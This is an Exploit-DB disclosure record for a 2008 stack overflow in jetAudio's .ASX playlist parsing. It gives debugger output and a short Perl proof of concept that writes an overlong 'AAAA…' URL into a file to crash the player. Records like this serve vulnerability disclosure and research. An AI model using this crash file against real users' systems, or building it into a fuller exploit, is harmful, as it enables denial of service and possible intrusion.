jetAudio <= 7.0.5 - .ASX Remote Stack Overflow Exploit PoC

ID EDB-ID:5085
Type exploitdb
Reporter laurent gaffié
Modified 2008-02-08T00:00:00


jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow Exploit PoC. CVE-2008-0747. Dos exploit for windows platform

                                            Application: jetAudio &lt;= 7.0.5 (.ASX) Remote Stack Overflow
Web Site:
Platform: Windows
Bug:Remote Stack Overflow
Extension: ASX
special condition: none


1) Introduction

2) Bug

3) Proof of concept

4) Credits

1) Introduction

A nice introduction to jetaudio  can be found :

2) Bug

When parsing an asx file with a long URL a stack overflow occurs.

3)Proof of concept

Proof of concept example :

An url with 1096 A ( http://AAAAA....) will overwritte ESI and crash the program

Here's the debugger output:
Access violation - code c0000005

eax=00000000 ebx=01187684 ecx=00000459 edx=0012d39c esi=41414141 edi=00000001

eip=00441dad esp=0012cf3c ebp=00000001 iopl=0         nv up ei pl nz na po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

JetAudio!CxImage::`copy constructor closure'+0x1109d:

00441dad 8b06             mov     eax,[esi]         ds:0023:41414141=????????

Here's the the Poc :

use strict;                                                   
use warnings;                                                 
my $file="myfile.asx";                            
my $payload = "A" x 1096;                                     
open( $FILE, "&gt;&gt;$file") or die "Cannot open $file: $!";       
print $FILE "http://".$payload;                               
print "$file has been created \n";                            


laurent gaffié

# [2008-02-08]